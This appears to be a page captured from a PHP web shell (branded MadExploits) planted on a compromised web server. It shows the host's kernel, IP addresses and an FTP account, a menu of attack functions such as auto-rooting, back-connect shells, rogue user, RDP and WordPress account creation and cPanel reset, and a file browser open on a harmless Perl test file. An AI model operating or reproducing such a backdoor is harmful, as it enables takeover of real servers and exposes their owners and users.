Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Test-Simple /
t /
Legacy /
subtest /
[ HOME SHELL ]
Name
Size
Permission
Action
args.t
620
B
-rw-r--r--
bail_out.t
1.25
KB
-rw-r--r--
basic.t
4.7
KB
-rw-r--r--
callback.t
1016
B
-rw-r--r--
die.t
535
B
-rw-r--r--
do.t
283
B
-rw-r--r--
events.t
376
B
-rw-r--r--
for_do_t.test
112
B
-rw-r--r--
fork.t
1.2
KB
-rw-r--r--
implicit_done.t
479
B
-rw-r--r--
line_numbers.t
3.77
KB
-rw-r--r--
plan.t
1.34
KB
-rw-r--r--
predicate.t
4.73
KB
-rw-r--r--
singleton.t
712
B
-rw-r--r--
threads.t
430
B
-rw-r--r--
todo.t
5.33
KB
-rw-r--r--
wstat.t
369
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : implicit_done.t
#!/usr/bin/perl -w # A subtest without a plan implicitly calls "done_testing" use strict; use Test::More; pass "Before"; subtest 'basic' => sub { pass "Inside sub test"; }; subtest 'with done' => sub { pass 'This has done_testing'; done_testing; }; subtest 'with plan' => sub { plan tests => 1; pass 'I have a plan, Batman!'; }; subtest 'skipping' => sub { plan skip_all => 'Skipping'; fail 'Shouldnt see me!'; }; pass "After"; done_testing;
Close